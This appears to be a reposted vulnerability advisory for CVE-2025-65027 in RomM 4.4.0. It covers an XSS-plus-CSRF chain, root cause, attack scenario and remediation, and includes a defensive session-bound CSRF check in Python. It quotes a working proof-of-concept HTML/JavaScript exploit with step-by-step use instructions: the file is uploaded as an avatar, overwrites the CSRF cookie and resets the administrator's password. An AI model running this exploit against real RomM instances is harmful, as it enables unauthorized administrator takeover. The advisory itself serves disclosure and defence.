[webapps] RomM 4.4.0 - XSS_CSRF Chain
CVE-2025-65027
RomM 4.4.0 contains a combined XSS and CSRF vulnerability that can lead to administrator account takeover.
High · CVSS 8.8

📋 Basic vulnerability information
| CVE | CVE-2025-65027 |
|---|---|
| Vulnerability type | Cross-site scripting + cross-site request forgery (XSS + CSRF chain) |
| Affected version | RomM 4.4.0 |
| Severity | High · CVSS 8.8 |
| Published | 2026-04-09 |
| Submitter | He4am (https://github.com/mHe4am) |
| Source | Exploit-DB original |
🔬 Root cause
User input (for example the game name and description fields) is stored and then rendered directly in the front-end page without adequate HTML encoding; in addition, critical administrative operations (such as changing user permissions or adding an administrator) do not enforce CSRF token validation, so an attacker can construct malicious requests.
🎯 Attack scenario
1. Outside the RomM platform (for example on a forum or by e-mail), the attacker lures a logged-in administrator into visiting a page containing a malicious script.
2. The script automatically sends a CSRF request to the RomM back end in the administrator's name (for example, adding a new administrator user).
3. Because CSRF protection is missing, the back end accepts the request and performs the operation.
4. The attacker obtains administrator privileges and controls the entire RomM instance.
💥 Impact
An attacker can exploit the chained vulnerabilities to create an administrator account without authorization and thereby take full control of the RomM platform, leading to data leakage and the malicious addition, deletion or modification of files, among other serious consequences.
⚔️ Original PoC
The original PoC constructs an HTML page that issues a POST request with XMLHttpRequest or fetch to RomM's add-administrator endpoint; at the same time, an XSS payload stored in a user-controllable field fires automatically when an administrator views that field and sends the above request with the authenticated cookies attached, completing the CSRF.
```html
# Exploit Author: He4am (https://github.com/mHe4am)
# -------------------
# Vulnerability: Chaining unrestricted file upload (XSS) + CSRF token reuse to bypass SameSite protection
# Impact: Admin account takeover
# Prerequisites:
# 1. Attacker needs an authenticated account (Viewer role is sufficient)
# 2. Victim must visit the uploaded malicious HTML file via a direct link
# Steps to reproduce:
# 1. Login to RomM
# 2. Obtain your CSRF token:
# - Open browser DevTools > Application tab (or Storage on Firefox) > Cookies
# - Copy the `romm_csrftoken` cookie value
# 3. Replace <ATTACKER_CSRF_TOKEN> below with your token
# 4. Replace <TARGET_ROMM_URL> with the target RomM instance URL (e.g., http://romm.local)
# 5. Save this file as `avatar.html`
# 6. Upload it as your profile avatar (http://romm.local/user/me) and click the Apply button
# 7. Locate the uploaded file's direct link:
# - DevTools > Network tab > Filter for `.html` files
# - Or capture it via proxy (e.g., Burp Suite)
# - It's usually something like: "http://romm.local/assets/romm/assets/users/<Random-ID>/profile/avatar.html"
# 8. Send this direct link of the uploaded avatar/file to the victim
# 9. When victim (e.g. admin) opens the link, their password will be changed to "Passw0rd"
# -------------------
# PoC Code:
<script>
const csrfToken = "<ATTACKER_CSRF_TOKEN>"; // CHANGE THIS - Your CSRF token from step 2
const targetURL = "<TARGET_ROMM_URL>"; // CHANGE THIS - Target RomM URL (e.g., http://romm.local)
const targetUserID = 1; // Default admin ID is always 1, CHANGE THIS if needed
const newPassword = "Passw0rd"; // Password to set for victim
// Overwrite CSRF cookie to match our token
document.cookie = `romm_csrftoken=${csrfToken}; path=/`;
// Execute account takeover by forcing the victim to change their password
fetch(targetURL + "/api/users/" + targetUserID, {
  method: 'PUT',
  credentials: 'include', // Send victim's session cookie
  headers: {
    'Content-Type': 'application/x-www-form-urlencoded',
    'x-csrftoken': csrfToken
  },
  body: "password=" + newPassword
})
.then(() => {
  console.log("Password changed successfully");
})
.catch(err => {
  console.error("Attack failed:", err);
});
</script>
# -------------------
# See full writeup for technical details: https://he4am.medium.com/bypassing-samesite-protection-chaining-xss-and-csrf-for-admin-ato-in-romm-44d910c54403
```

🛡️ Remediation
Upgrade to RomM 4.4.1 or later. Interim measures include: applying strict HTML entity encoding to all user input, adding and validating a CSRF token on critical operations (such as permission changes and user management), and enabling a Content-Security-Policy header.
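The following added example (my own illustration, not RomM's code; the server secret, session ids and function names are assumptions) contrasts a plain double-submit cookie check with a session-bound one, showing why the token-reuse step in the PoC passes the first and fails the second. It covers the CSRF half of the root cause and the token-validation item of the remediation above.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret for this example (assumed; not a RomM value).
SERVER_SECRET = b"example-server-secret-not-for-production"


def naive_csrf_check(cookie_token: str, header_token: str) -> bool:
    """Plain double-submit: accepts any request whose cookie and header agree.
    A same-origin script that can write document.cookie satisfies this with a
    token of its own choosing, which is the weakness the PoC above relies on."""
    return bool(cookie_token) and hmac.compare_digest(cookie_token.encode(), header_token.encode())


def issue_csrf_token(session_id: str) -> str:
    """Token bound to one session: nonce.HMAC(secret, session_id:nonce)."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def bound_csrf_check(session_id: str, cookie_token: str, header_token: str) -> bool:
    """Session-bound check: cookie and header must agree AND the token must verify
    under the server secret for the session that actually sent the request."""
    if not cookie_token or not hmac.compare_digest(cookie_token.encode(), header_token.encode()):
        return False
    nonce, sep, mac = cookie_token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac.encode(), expected.encode())


def demo() -> dict:
    """Replays the token-reuse pattern against both checks (constructed session ids)."""
    victim_session = "victim-session-id"
    attacker_session = "attacker-session-id"
    # Token the attacker obtained for their own session; in the forged request it
    # appears in both the overwritten romm_csrftoken cookie and the x-csrftoken header,
    # while the browser attaches the victim's session cookie.
    attacker_token = issue_csrf_token(attacker_session)
    legit_token = issue_csrf_token(victim_session)
    return {
        "naive_accepts_forged": naive_csrf_check(attacker_token, attacker_token),
        "bound_rejects_forged": not bound_csrf_check(victim_session, attacker_token, attacker_token),
        "bound_accepts_legit": bound_csrf_check(victim_session, legit_token, legit_token),
        "bound_rejects_mismatch": not bound_csrf_check(victim_session, legit_token, attacker_token),
    }
```

The upload half of the chain (HTML served same-origin from the avatar path) needs a separate fix, such as accepting only validated image content for avatars and serving user uploads with a non-executable content type.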
⚠️ This article is based on public vulnerability databases and is intended for security research and defensive reference only. Generated: 2026-05-07 07:33 | Source: Exploit-DB